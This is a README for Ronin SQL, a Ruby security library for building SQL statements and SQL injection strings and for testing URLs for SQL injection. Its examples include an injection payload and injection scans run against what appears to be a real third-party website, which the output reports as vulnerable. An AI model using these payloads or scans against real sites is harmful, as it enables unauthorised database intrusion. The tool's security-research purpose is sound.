Ronin SQL
Ronin SQL is a Ruby library for Ronin that provids support for SQL related security tasks.
Ronin is a Ruby platform for exploit development and security research. Ronin allows for the rapid development and distribution of code, exploits or payloads over many common Source-Code-Management (SCM) systems.
Ruby
Ronin's Ruby environment allows security researchers to leverage Ruby with ease. The Ruby environment contains a multitude of convenience methods for working with data in Ruby, a Ruby Object Database, a customized Ruby Console and an extendable command-line interface.
Extend
Ronin's more specialized features are provided by additional Ronin libraries, which users can choose to install. These libraries can allow one to write and run Exploits and Payloads, scan for PHP vulnerabilities, perform Google Dorks or run 3rd party scanners.
Publish
Features
- Provides an DSL for crafting normal SQL and SQL injections.
- Provides tests for finding SQL injections.
Synopsis
-
Start the Ronin console with Ronin SQL preloaded:
$ ronin-sql
Examples
-
Generate valid SQL using the Ronin SQL DSL:
require 'ronin/code/sql' Code.sql { select(:from => :users, :where => (name == 'bob')) }.to_s # => "SELECT * FROM users WHERE name = 'bob'" -
Generate valid SQL injections using the Ronin SQL injection DSL:
Code.sql_injection { escape_string { has_table?(:users) } }.to_s # => "' AND (SELECT count(*) FROM users) = 1 --" -
Test a URL for SQL Injection (SQLi):
require 'ronin/sql' url = URI('http://redteatrosalternativos.com/_05enlaces/links/phpHoo3.php?viewCat=1') url.has_sqli? # => true -
Get the first viable SQLi vulnerability:
url.first_sqli # => #<Ronin::SQL::Injection: ...>
-
Scan a URL for SQLi vulnerabilities:
url.sqli_scan # => [#<Ronin::SQL::Injection: ...>, ...]
Requirements
Install
$ sudo gem install ronin-sql